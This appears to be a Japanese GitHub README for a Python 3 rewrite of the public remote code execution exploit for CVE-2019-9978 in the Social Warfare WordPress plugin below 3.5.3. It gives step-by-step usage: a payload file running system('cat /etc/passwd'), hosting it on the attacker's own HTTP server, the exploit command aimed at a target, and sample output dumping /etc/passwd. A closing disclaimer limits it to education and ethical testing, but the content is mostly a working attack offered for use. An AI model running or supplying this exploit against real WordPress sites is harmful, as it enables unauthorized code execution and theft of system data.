
WordPress用Social Warfareプラグイン(バージョン3.5.3未満)におけるリモートコード実行(RCE)の脆弱性。
WordPress用Social Warfareプラグインのリモートコード実行(RCE)脆弱性で、3.5.3未満の全バージョンに影響します。
元の公開エクスプロイトは古いバージョンのPythonで書かれており、現在の環境では正しく動作しなくなりました。
Python 3と完全に互換性を持たせてエクスプロイトを書き直し、モダンなツールで使用、理解、統合しやすくしました。
以下の内容でpayload.txtというファイルを作成してください:
<pre>system('cat /etc/passwd')</pre>
Pythonを使用してペイロードを提供します:
python3 -m http.server 8000
これにより、payload.txtが次のURLでアクセス可能になります:
http://<your-ip>:8000/payload.txt
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
--payload-uri http://<your-ip>:8000/payload.txt
ターゲットが脆弱な場合、以下のような出力が得られます:
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...



🧬 このペイロードがあなたの役に立ったなら、⭐をいただけると嬉しいです。
< 3.5.3⚠️ 免責事項: このリポジトリは教育および倫理的なテスト目的のみです。
自分が所有していないシステムに対するこのエクスプロイトの不正使用は固く禁止されています。